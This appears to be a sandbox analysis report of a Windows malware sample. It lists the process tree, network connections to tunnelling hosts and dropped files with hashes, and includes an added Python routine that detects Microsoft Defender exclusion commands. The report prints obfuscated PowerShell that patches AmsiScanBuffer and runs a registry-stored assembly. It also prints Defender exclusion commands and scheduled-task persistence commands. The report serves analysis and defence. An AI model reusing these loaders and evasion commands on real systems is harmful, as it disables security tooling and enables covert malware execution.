C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xjeLFlXJvxoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BgqrkrvyFKyuUC,[Parameter(Position=1)][Type]$mHOHrtAtbI)$tyEVppdzzpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$tyEVppdzzpa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',M'+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$tyEVppdzzpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+'eB'+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$mHOHrtAtbI,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $tyEVppdzzpa.CreateType();}$XvNsKxOuZSUXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dll')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+'s');$ZmpTZzwfgWUUhb=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OnYMlqRfuVuNKBPJRLT=xjeLFlXJvxoT @([String])([IntPtr]);$hGxWaomfUCSBCKIuthHHip=xjeLFlXJvxoT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SvHQLalbNuG=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FMPRuWkRraqNqN=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PtaUzRiaDWdDVxtcq=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$znjogQI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FMPRuWkRraqNqN,$OnYMlqRfuVuNKBPJRLT).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kJOkllUHVpOiOiyoM=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$znjogQI,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$knRNvBfrBw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,4,[ref]$knRNvBfrBw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kJOkllUHVpOiOiyoM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,0x20,[ref]$knRNvBfrBw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('x'+'4'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a0b03bef-0f70-49e4-93e4-31bbeeeee3d6}

C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe

"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe

"C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"

C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe

"C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4V5.2.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\x4Malicious'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Malicious'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "x4Joex1" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "Malicious" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4Malicious" /tr "C:\Users\Admin\x4Malicious"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'

C:\ProgramData\x4V5.2.exe

"C:\ProgramData\x4V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'

C:\ProgramData\x4Shellcode.exe

"C:\ProgramData\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEoEBGJjiChX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uOoTGwaAgywXvz,[Parameter(Position=1)][Type]$AGuOKAYXqA)$RmXwndVcdnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'te'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+''+','+''+'A'+'uto'+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$RmXwndVcdnP.DefineConstructor('RT'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uOoTGwaAgywXvz).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+'d');$RmXwndVcdnP.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+'ig'+','+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$AGuOKAYXqA,$uOoTGwaAgywXvz).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ge'+[Char](100)+'');Write-Output $RmXwndVcdnP.CreateType();}$XGNzFszxOfdtL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$uqvipmuGFvoYqY=$XGNzFszxOfdtL.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eHuKsvmAVPIIiRnVQsw=DEoEBGJjiChX @([String])([IntPtr]);$zVZKtbqIDcbtSGwsaNpBbj=DEoEBGJjiChX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eaFLgIIWtvN=$XGNzFszxOfdtL.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$wABVHMQrYEjHvh=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$COnTZLLtMOEuyAgOn=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$raCDuSL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wABVHMQrYEjHvh,$eHuKsvmAVPIIiRnVQsw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$JzmyhkInvwLCaepRW=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$raCDuSL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$xSmRcpBvxE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,4,[ref]$xSmRcpBvxE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JzmyhkInvwLCaepRW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,0x20,[ref]$xSmRcpBvxE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Joex1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Joex1.exe'
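The two commands above whitelist the dropped payload in Microsoft Defender before it runs: one exclusion by bare process name (x4Joex1.exe, no path), one by the file path under C:\ProgramData, with -ExecutionPolicy Bypass on the same line. Both Add-MpPreference calls need an elevated session, and the exclusion lists persist in Defender's configuration until removed. What follows is an added detection routine written for this page, not code from the report or the sandbox: it scores collected process command lines for exactly this pattern and emits the matching Remove-MpPreference commands. The first two sample inputs are the command lines above; the other two are constructed (a read-only query and an exclusion for a hypothetical vendor directory under Program Files), and the regexes and score weights are assumptions for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
# Sample inputs: the two exclusion commands from this report plus two constructed lines.
SAMPLE_CMDLINES = [
    PS + " -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Joex1.exe'",
    PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Joex1.exe'",
    "powershell.exe -Command Get-MpPreference",                                            # constructed, read-only
    r"powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Vendor\App'",  # constructed, admin-owned dir
]

CANON = {"path": "Path", "process": "Process", "extension": "Extension", "ipaddress": "IpAddress"}
ADD_MP = re.compile(r"\bAdd-MpPreference\b", re.IGNORECASE)
EXCLUSION = re.compile(
    r"-Exclusion(Path|Process|Extension|IpAddress)\s+(?:(['\"])(.+?)\2|(\S+))", re.IGNORECASE)
BYPASS = re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass\b", re.IGNORECASE)
# Locations writable without elevation; an exclusion pointing here shields a dropper.
USER_WRITABLE = re.compile(
    r"^(?:[A-Za-z]:\\(?:ProgramData|Users\\[^\\]+)(?:\\|$)|%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|PROGRAMDATA)%)",
    re.IGNORECASE)


@dataclass
class Finding:
    cmdline: str
    exclusions: List[Tuple[str, str]] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)
    score: int = 0


def analyse(cmdline: str) -> Optional[Finding]:
    """Score one process command line; None when it does not change Defender preferences."""
    if not ADD_MP.search(cmdline):
        return None
    f = Finding(cmdline)
    for m in EXCLUSION.finditer(cmdline):
        kind = CANON[m.group(1).lower()]
        value = m.group(3) if m.group(3) is not None else m.group(4)
        f.exclusions.append((kind, value))
        f.reasons.append(f"Defender exclusion added ({kind}): {value}")
        f.score += 3
        if kind == "Path" and USER_WRITABLE.match(value):
            f.reasons.append("excluded path is in a user-writable location")
            f.score += 3
        if kind == "Process" and "\\" not in value:
            f.reasons.append("process exclusion by bare file name, no path")
            f.score += 2
    if BYPASS.search(cmdline):
        f.reasons.append("ExecutionPolicy Bypass on the same command line")
        f.score += 2
    return f


def triage(cmdlines) -> List[Finding]:
    """Keep only the lines that touch Defender preferences, in input order."""
    return [f for f in map(analyse, cmdlines) if f is not None]


def remediation(f: Finding) -> List[str]:
    """Remove-MpPreference commands that undo each exclusion in a finding."""
    return [f"Remove-MpPreference -Exclusion{kind} '{value}'" for kind, value in f.exclusions]


if __name__ == "__main__":
    for f in sorted(triage(SAMPLE_CMDLINES), key=lambda x: -x.score):
        print(f"[{f.score}] {f.cmdline}")
        for r in f.reasons:
            print("   -", r)
        for cmd in remediation(f):
            print("   fix:", cmd)
```

Command-line telemetry is the cheapest source for this rule, but it is not the only one: the change itself is recorded by Defender as event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, and PowerShell script block logging (event ID 4104) captures the cmdlet even when the process command line is encoded or truncated, so the same regexes can be run over those records as a cross-check.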

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2a93eae8-0868-45cf-842e-7636e08ae158}

C:\Users\Admin\x4Malicious

C:\Users\Admin\x4Malicious

C:\Users\Admin\x4Malicious

C:\Users\Admin\x4Malicious

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\ImmersiveControlPanel\SystemSettings.exe

"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc

C:\Windows\System32\oobe\UserOOBEBroker.exe

C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 rentry.co udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 172.67.75.40:80 rentry.co tcp
US 172.67.75.40:443 rentry.co tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 104.16.185.241:80 icanhazip.com tcp
N/A 127.0.0.1:49799 tcp
N/A 127.0.0.1:49802 tcp
US 172.67.75.40:443 rentry.co tcp
N/A 127.0.0.1:49805 tcp
US 162.159.137.232:443 discord.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:49810 tcp
N/A 127.0.0.1:49816 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:49821 tcp
N/A 127.0.0.1:49824 tcp
N/A 127.0.0.1:49828 tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:49831 tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
FR 162.19.58.159:443 i.ibb.co tcp
US 147.185.221.18:41012 tcp
US 147.185.221.19:2519 seems-radio.gl.at.ply.gg tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
US 147.185.221.19:2519 seems-radio.gl.at.ply.gg tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp
GB 184.28.176.81:443 tcp
GB 51.132.193.104:443 browser.pipe.aria.microsoft.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
US 147.185.221.18:41012 tcp
US 147.185.221.16:13795 adult-purchased.gl.at.ply.gg tcp

Files

memory/1940-0-0x00007FF962673000-0x00007FF962675000-memory.dmp

memory/1940-3-0x000002E2A0920000-0x000002E2A0942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5nmxuch.h44.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1940-10-0x00007FF962670000-0x00007FF963132000-memory.dmp

memory/1940-11-0x00007FF962670000-0x00007FF963132000-memory.dmp

memory/1940-12-0x00007FF962670000-0x00007FF963132000-memory.dmp

memory/1940-13-0x000002E2A0F30000-0x000002E2A10F2000-memory.dmp

C:\Users\Public\uninstaller.bat

MD5 5be8fed544d05f92d1f7ecd4015f461a
SHA1 adaf0a846145d891b55d625bb75ae13928f4483c
SHA256 a6e3b90aea7ade9e66ce05dd726737e116a0dea80bcd20ca96ec03e8dedcf699
SHA512 debb8e65a783dc289b02340c0efd11a10e331d9e728d8ba5ae8ec79267e9aeaab611a406def956660f0b3a1fbeb702e564a7ea271c4359734c157f2232c288c2

memory/1940-21-0x00007FF962670000-0x00007FF963132000-memory.dmp

C:\ProgramData\winlog32.bat

MD5 230f2e8c6fa8eee3935356ca122db8ce
SHA1 0d25a7f01224d87b0a408f6e639432d44b20db65
SHA256 4e9d91b0feca6307b850061006f202601154fb0c208306f389810fc8e601e660
SHA512 773436cc55584a52243dd715a29d924dac8284bcba6602c7c5a2548c00213c230e27cc991cb6397fb5bda2ecb9f06ad3f5c6deb6f87f14d530138cce1c9e55c8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 60efcaf245291c5fb8d700f099c371ea
SHA1 f066c7e948db3cda233b4e2786aad20c7f106920
SHA256 c15fa04d510034cd6e9148ebb92a559e546843d5db98a27086504fab4f36d02e
SHA512 9b1b41ca283062e3ba80d358d5e0a9dfd2603cb66ced63b19349801cb0b260473d8b56a2fbc1f7bda8beceb3499f8ad7dfdef6090e87299e5c7497825749d513

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4ef1064ce7b9afca99b64412656b1f8b
SHA1 ada040d59728be3036296563f24dfc2644b82510
SHA256 a85a40d4c9e8e2ead9d7a14d8b0f8ddf07cc881e46da8444f7d13eb1872c9565
